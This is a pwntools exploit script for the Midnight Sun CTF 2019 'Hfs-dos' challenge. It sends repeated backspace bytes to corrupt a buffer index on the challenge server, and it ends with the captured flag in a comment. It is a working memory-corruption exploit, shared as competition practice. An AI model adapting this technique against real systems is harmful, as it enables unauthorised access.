Midnight Sun CTF 2019 Quals Hfs-dos

exp.py

#!/usr/bin/env python
from pwn import *

context(terminal=['tmux', 'splitw', '-h'])  # horizontal split window
# context(terminal=['tmux', 'new-window'])  # open new window

# libc = ELF('')
#elf = ELF('./run')
#context(os='linux', arch=elf.arch)
#context(log_level='debug')  # output verbose log

RHOST = "hfs-os-01.play.midnightsunctf.se"
RPORT = 31337
LHOST = "127.0.0.1"
LPORT = 31337


def dbg(ss):
    log.info("%s: 0x%x" % (ss, eval(ss)))

conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?'  # pop option
if opt in 'rl':
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    gdbscript = """

    continue
    """.format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
    conn = gdb.debug(['./run'], gdbscript=gdbscript)
else:
    conn = process(['./run', 'debug'])
    # conn = process(['./run'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)

# exploit
log.info('Pwning')

conn.sendafter('[HFS_MBR]>', 'sojupwner')
conn.sendafter('Press any key to load HFS-OS!', '\n')
time.sleep(0.1)

conn.send('\x7f'*0x3)
time.sleep(0.1)
conn.send('2\x0d')

# 0x13f
for i in range(0x138/8):
    time.sleep(0.1)
    conn.send('\x7f'*0x8)
time.sleep(0.1)
conn.send('\x7f'*0x7)
time.sleep(0.1)
conn.send(chr(0x21)+'\x0d')

conn.interactive()
'''
[HFS-DOS]> command not found [HFS SECURE SHELL] Here is your flag for HFS-MBR: m
idnight{th4t_was_n0t_4_buG_1t_is_a_fEatuR3}
'''